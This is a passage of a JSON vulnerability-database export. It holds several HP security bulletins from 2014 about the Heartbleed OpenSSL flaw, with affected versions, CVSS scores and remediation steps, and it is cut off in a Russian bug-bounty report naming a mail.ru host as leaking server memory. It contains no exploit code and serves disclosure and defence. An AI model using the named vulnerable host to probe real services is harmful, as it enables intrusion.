http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetai\r\nls/?javax.portlet.begCacheTok=com.vignette.cachetoken&amp;javax.portlet.endCacheT\r\nok=com.vignette.cachetoken&amp;javax.portlet.prp_bd9b6997fbc7fc515f4cf4626f5c8d01\r\n=wsrp-navigationalState&#37;3Didx&#37;253D&#37;257CswItem&#37;253DMTX_335408c4a064478d934e942\r\n3c0&#37;257CswEnvOID&#37;253D4024&#37;257CitemLocale&#37;253D&#37;257CswLang&#37;253D&#37;257Cmode&#37;253D5&#37;\r\n257Caction&#37;253DdriverDocument&amp;javax.portlet.tpst=bd9b6997fbc7fc515f4cf4626f5c\r\n8d01&amp;sp4ts.oid=5104019&amp;ac.admitted=1395175158147.876444892.199480143\r\n\r\nHP Onboard Administrator &#40;OA&#41;\r\n HPSBMU02994\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04236062\r\n\r\nHP System Management Homepage &#40;SMH&#41;\r\n HPSBMU02998\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04239372\r\n\r\nHP Integrated Lights-Out 2 &#40;iLO 2&#41;\r\n HPSBMU03006\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04244787\r\n\r\nHP BladeSystem c-Class Virtual Connect Firmware, Ethernet plus 4/8Gb 20-port\r\nand 8Gb 24-port FC Edition Component for Windows v4.10 and v4.20 Smart\r\nComponents installer\r\n HPSBMU03032\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04272594\r\n\r\nHP Smart Update Manager &#40;SUM&#41;\r\n HPSBMU02997\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04239375\r\n\r\nHISTORY\r\nVersion:1 &#40;rev.1&#41; - 30 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer&#39;s patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel.  For other issues about\r\nthe content of this Security Bulletin, send e-mail to [email protected].\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: [email protected]\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided &quot;as is&quot;\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 &#40;GNU/Linux&#41;\r\n\r\niEYEARECAAYFAlNhfjwACgkQ4B86/C0qfVkhMgCg+QcqGt6ad3u/sMCYkEDR9Su6\r\nLjYAn0xSUE51gcQ8Oap+n5GKA8ouoARE\r\n=xVqC\r\n-----END PGP SIGNATURE-----\r\n\r\n",
            "edition": 1,
            "modified": "2014-05-02T00:00:00",
            "published": "2014-05-02T00:00:00",
            "id": "SECURITYVULNS:DOC:30523",
            "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30523",
            "title": "[security bulletin] HPSBMU03030 rev.1 - HP Service Pack for ProLiant &#40;SPP&#41; Bundled Software running OpenSSL, Remote Disclosure of Information",
            "type": "securityvulns",
            "cvss": {
                "score": 5.0,
                "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"
            }
        },
        {
            "lastseen": "2018-08-31T11:10:51",
            "bulletinFamily": "software",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04248997\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04248997\r\nVersion: 1\r\n\r\nHPSBGN03008 rev.1 - HP Software Service Manager, &quot;HeartBleed&quot; OpenSSL\r\nVulnerability, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-16\r\nLast Updated: 2014-04-16\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nThe Heartbleed vulnerability was detected in specific OpenSSL versions.\r\nOpenSSL is a 3rd party product that is embedded with some of HP Software\r\nproducts. This bulletin objective is to notify HP Software customers about\r\nproducts affected by the Heartbleed vulnerability.\r\n\r\nNOTE: The Heartbleed vulnerability &#40;CVE-2014-0160&#41; is a vulnerability found\r\nin the OpenSSL cryptographic software library. This weakness potentially\r\nallows disclosure of information that is normally protected by the SSL/TLS\r\nprotocol. The impacted products in the list below are vulnerable due to\r\nembedding OpenSSL standard release software.\r\n\r\nReferences: CVE-2014-0160 &#40;SSRT101516&#41;\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nService Manager, 9.32 &#40;including all patches&#41;, 9.33 &#40;GA,9.33 p1, 9.33-p1-rev1\r\n&amp; 9.33.p2&#41;\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n  Reference              Base Vector             Base Score\r\nCVE-2014-0160    &#40;AV:N/AC:L/Au:N/C:P/I:N/A:N&#41;       5.0\r\n===========================================================\r\n             Information on CVSS is documented\r\n            in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nNOTE: OpenSSL is an external product embedded in HP products.\r\n\r\nSecurity guidelines for remediation can be downloaded from the following\r\nlink:\r\n\r\nhttp://support.openview.hp.com/selfsolve/document/KM00843525\r\n\r\nHP recommends following the Service Manager guidelines and completing the\r\nfollowing action items:\r\n\r\nRevocation of the old key pairs that were just superseded\r\nChanging potentially affected passwords\r\nInvalidating all session keys and cookies\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within the\r\nHP products listed in the security bulletin. The bulletin does not apply to\r\nany other 3rd party application &#40;e.g. operating system, web server, or\r\napplication server&#41; that may be required to be installed by the customer\r\naccording instructions in the product install guide. To learn more about HP\r\nSoftware Incident Response, please visit http://www8.hp.com/us/en/software-so\r\nlutions/enterprise-software-security-center/response-center.html . Software\r\nupdates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 &#40;rev.1&#41; - 16 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer&#39;s patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel.  For other issues about\r\nthe content of this Security Bulletin, send e-mail to [email protected].\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: [email protected]\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided &quot;as is&quot;\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 &#40;GNU/Linux&#41;\r\n\r\niEYEARECAAYFAlNPHNsACgkQ4B86/C0qfVmMwQCgi9CnzzUd9g7tjfv9xFQ32BSs\r\nWG0AoPOEoiZs9gYLWbaBwacUhVaC5mGV\r\n=oGCq\r\n-----END PGP SIGNATURE-----\r\n\r\n",
            "edition": 1,
            "modified": "2014-04-20T00:00:00",
            "published": "2014-04-20T00:00:00",
            "id": "SECURITYVULNS:DOC:30473",
            "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30473",
            "title": "[security bulletin] HPSBGN03008 rev.1 - HP Software Service Manager, &quot;HeartBleed&quot; OpenSSL Vulnerability, Remote Disclosure of Information",
            "type": "securityvulns",
            "cvss": {
                "score": 5.0,
                "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"
            }
        },
        {
            "lastseen": "2018-08-31T11:10:51",
            "bulletinFamily": "software",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04239374\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04239374\r\nVersion: 1\r\n\r\nHPSBMU02999 rev.1 - HP Software Autonomy WorkSite Server &#40;On-Premises\r\nSoftware&#41;, Running OpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-15\r\nLast Updated: 2014-04-15\r\n\r\nPotential Security Impact: Remote disclosure of Information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential vulnerability exists in HP Autonomy WorkSite Server &#40;on-premises\r\nsoftware&#41; running OpenSSL. The vulnerability can be exploited to allow remote\r\ndisclosure of information.\r\n\r\nThe Heartbleed vulnerability was detected in specific OpenSSL versions.\r\nOpenSSL is a 3rd party product that is embedded with some of HP Software\r\nproducts. This bulletin objective is to notify HP Software customers about\r\nproducts affected by the Heartbleed vulnerability.\r\n\r\nNote: The Heartbleed vulnerability &#40;CVE-2014-0160&#41; is a vulnerability found\r\nin the OpenSSL product cryptographic software library product. This weakness\r\npotentially allows disclosure of information protected, under normal\r\nconditions, by the SSL/TLS protocol. The impacted products appear in the list\r\nbelow are vulnerable due to embedding OpenSSL standard release software.\r\n\r\nReferences:\r\nCVE-2014-0160 &#40;SSRT101505&#41;\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Autonomy WorkSite Server v9.0 SP1 &#40;on-premises software&#41;\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n  Reference              Base Vector             Base Score\r\nCVE-2014-0160    &#40;AV:N/AC:L/Au:N/C:P/I:N/A:N&#41;       5.0\r\n===========================================================\r\n             Information on CVSS is documented\r\n            in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has provided an update to HP Autonomy WorkSite Server v9.0 SP1\r\n&#40;on-premises software&#41; that will address the OpenSSL vulnerability. https://w\r\norksitesupport.autonomy.com/worksite/Scripts/GetDoc.aspx?latest=0&#37;26nrtid=!nr\r\ntdms:0:!session:10.253.1.101:!database:SUPPORT:!document:1351832,1\r\n\r\nNote: after applying the update, HP recommends these additional steps to\r\nassure the vulnerability is addressed.\r\n\r\nRevoke old key pairs that were just superseded\r\nChange all potentially affected passwords\r\nInvalidate all session keys and cookies\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within HP\r\nAutonomy WorkSite Server &#40;on-premises Software&#41;. The bulletin does not apply\r\nto any other 3rd party application &#40;e.g. operating system, web server, or\r\napplication server&#41; that may be required to be installed by the customer\r\naccording instructions in the product install guide.\r\n\r\nTo learn more about HP Software Incident Response, please visit http://www8.h\r\np.com/us/en/software-solutions/enterprise-software-security-center/response-c\r\nenter.html .\r\n\r\nSoftware updates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 &#40;rev.1&#41; - 15 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer&#39;s patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel.  For other issues about\r\nthe content of this Security Bulletin, send e-mail to [email protected].\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: [email protected]\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided &quot;as is&quot;\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 &#40;GNU/Linux&#41;\r\n\r\niEYEARECAAYFAlNNn1wACgkQ4B86/C0qfVm/sQCg+dFq6zytvlfYlmexvErif+Bg\r\nZooAnRDUeVqwXlt8KEGyQrnGheC43CH0\r\n=6WRm\r\n-----END PGP SIGNATURE-----\r\n\r\n",
            "edition": 1,
            "modified": "2014-04-20T00:00:00",
            "published": "2014-04-20T00:00:00",
            "id": "SECURITYVULNS:DOC:30479",
            "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30479",
            "title": "HP Autonomy WorkSite Server v9.0",
            "type": "securityvulns",
            "cvss": {
                "score": 5.0,
                "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"
            }
        },
        {
            "lastseen": "2018-08-31T11:10:51",
            "bulletinFamily": "software",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nDocument ID: c04260456\r\nVersion: 2\r\n\r\nHPSBMU03017 rev.2 - HP Software Connect-IT running OpenSSL, Remote Disclosure\r\nof Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-21\r\nLast Updated: 2014-04-25\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Software\r\nConnect-IT running OpenSSL. The Heartbleed vulnerability was detected in\r\nspecific OpenSSL versions. OpenSSL is a 3rd party product that is embedded\r\nwith some of HP Software products. This bulletin objective is to notify HP\r\nSoftware customers about products affected by the Heartbleed vulnerability.\r\n\r\nNote: The Heartbleed vulnerability &#40;CVE-2014-0160&#41; is a vulnerability found\r\nin the OpenSSL product cryptographic software library product. This weakness\r\npotentially allows disclosure of information protected, under normal\r\nconditions, by the SSL/TLS protocol. The impacted products appear in the list\r\nbelow are vulnerable due to embedding OpenSSL standard release software.\r\n\r\nReferences: CVE-2014-0160 &#40;SSRT101528&#41;\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Connect-IT 9.52 &#40;including all patches&#41;, 9.53 &#40;including all patches&#41;\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n  Reference              Base Vector             Base Score\r\nCVE-2014-0160    &#40;AV:N/AC:L/Au:N/C:P/I:N/A:N&#41;       5.0\r\n===========================================================\r\n             Information on CVSS is documented\r\n            in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has made the following software updates available for HP Software\r\nConnect-IT:\r\n\r\nHP Software Connect-IT for Windows:\r\n\r\nhttp://support.openview.hp.com/selfsolve/document/LID/HPCIT_00068\r\n\r\nHP Software Connect-IT for Linux:\r\n\r\nhttp://support.openview.hp.com/selfsolve/document/LID/HPCIT_00069\r\n\r\nHP recommends following Connect-IT guidelines including the following action\r\nitems:\r\n\r\nRevocation of the old key pairs that were just superseded\r\nChanging potentially affected passwords\r\nInvalidating all session keys and cookies\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within the\r\nHP products listed in the security bulletin. The bulletin does not apply to\r\nany other 3rd party application &#40;e.g. operating system, web server, or\r\napplication server&#41; that may be required to be installed by the customer\r\naccording instructions in the product install guide.\r\n\r\nTo learn more about HP Software Incident Response, please visit http://www8.h\r\np.com/us/en/software-solutions/enterprise-software-security-center/response-c\r\nenter.html .\r\n\r\nSoftware updates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 &#40;rev.1&#41; - 21 April 2014 - Initial release\r\nVersion:2 &#40;rev.2&#41; - 25 April 2014 - Added links to Windows and Linux patches\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer&#39;s patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel.  For other issues about\r\nthe content of this Security Bulletin, send e-mail to [email protected].\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: [email protected]\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided &quot;as is&quot;\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 &#40;GNU/Linux&#41;\r\n\r\niEYEARECAAYFAlNae+UACgkQ4B86/C0qfVnanACfYri6ZfqCI5DCQ9BYtTFafBiY\r\nQz8AoJCnza5IXEegJ6CngyhCGfn4SGJI\r\n=t5NX\r\n-----END PGP SIGNATURE-----\r\n\r\n",
            "edition": 1,
            "modified": "2014-05-01T00:00:00",
            "published": "2014-05-01T00:00:00",
            "id": "SECURITYVULNS:DOC:30500",
            "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30500",
            "title": "[security bulletin] HPSBMU03017 rev.2 - HP Software Connect-IT running OpenSSL, Remote Disclosure of Information",
            "type": "securityvulns",
            "cvss": {
                "score": 5.0,
                "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"
            }
        },
        {
            "lastseen": "2018-08-31T11:10:51",
            "bulletinFamily": "software",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04236062\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04236062\r\nVersion: 1\r\n\r\nHPSBMU02994 rev.1 - HP BladeSystem c-Class Onboard Administrator &#40;OA&#41; running\r\nOpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-13\r\nLast Updated: 2014-04-13\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified in HP BladeSystem\r\nc-Class Onboard Administrator &#40;OA&#41; running OpenSSL. This is the OpenSSL\r\nvulnerability known as &quot;Heartbleed&quot; which could be exploited remotely\r\nresulting in disclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101500\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP BladeSystem c-Class Onboard Administrator &#40;OA&#41; v4.11 and 4.20\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n  Reference              Base Vector             Base Score\r\nCVE-2014-0160    &#40;AV:N/AC:L/Au:N/C:P/I:N/A:N&#41;       5.0\r\n===========================================================\r\n             Information on CVSS is documented\r\n            in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nversions of HP Onboard Administrator &#40;OA&#41;. This bulletin will be revised when\r\nthe software updates are released.\r\n\r\nNotes\r\n\r\nCustomers also have the option to downgrade OA firmware to any version prior\r\nto OA v4.11 if that meets the requisite Hardware/feature support for the\r\nenclosure configuration.\r\nNo action is required unless the OA is running the firmware versions\r\nexplicitly listed as vulnerable.\r\n\r\nHISTORY\r\nVersion:1 &#40;rev.1&#41; - 13 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer&#39;s patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel.  For other issues about\r\nthe content of this Security Bulletin, send e-mail to [email protected].\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: [email protected]\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided &quot;as is&quot;\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 &#40;GNU/Linux&#41;\r\n\r\niEYEARECAAYFAlNK/UsACgkQ4B86/C0qfVmEFACggs/Q1GaEsxwM9Vq17prvnMA9\r\nzwsAn08KV2HUERq6QUThuGZ4USDSSh9S\r\n=ItbO\r\n-----END PGP SIGNATURE-----\r\n\r\n",
            "edition": 1,
            "modified": "2014-04-20T00:00:00",
            "published": "2014-04-20T00:00:00",
            "id": "SECURITYVULNS:DOC:30475",
            "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30475",
            "title": "[security bulletin] HPSBMU02994 rev.1 - HP BladeSystem c-Class Onboard Administrator &#40;OA&#41; running OpenSSL, Remote Disclosure of Information",
            "type": "securityvulns",
            "cvss": {
                "score": 5.0,
                "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"
            }
        }
    ],
    "hackerone": [
        {
            "lastseen": "2018-11-23T14:56:22",
            "bulletinFamily": "bugbounty",
            "bounty": 200.0,
            "cvelist": [],
            "description": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u043d\u0430 portal.sf.mail.ru\r\n\u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0447\u0438\u0442\u0430\u0442\u044c \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u0443\u044e \u043f\u0430\u043c\u044f\u0442\u044c \u043a\u0443\u0441\u043a\u0430\u043c\u0438 \u0440\u0430\u0437\u043c\u0435\u0440\u043e\u043c \u0434\u043e 64\u041a\u0411. \u041f\u0440\u0438\u0447\u0435\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0434\u0432\u0443\u0441\u0442\u043e\u0440\u043e\u043d\u043d\u044f\u044f, \u044d\u0442\u043e \u0437\u043d\u0430\u0447\u0438\u0442, \u0447\u0442\u043e \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0432\u044b \u043c\u043e\u0436\u0435\u0442\u0435 \u0447\u0438\u0442\u0430\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430, \u043d\u043e \u0438 \u0441\u0435\u0440\u0432\u0435\u0440 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430 \u043c\u043e\u0436\u0435\u0442 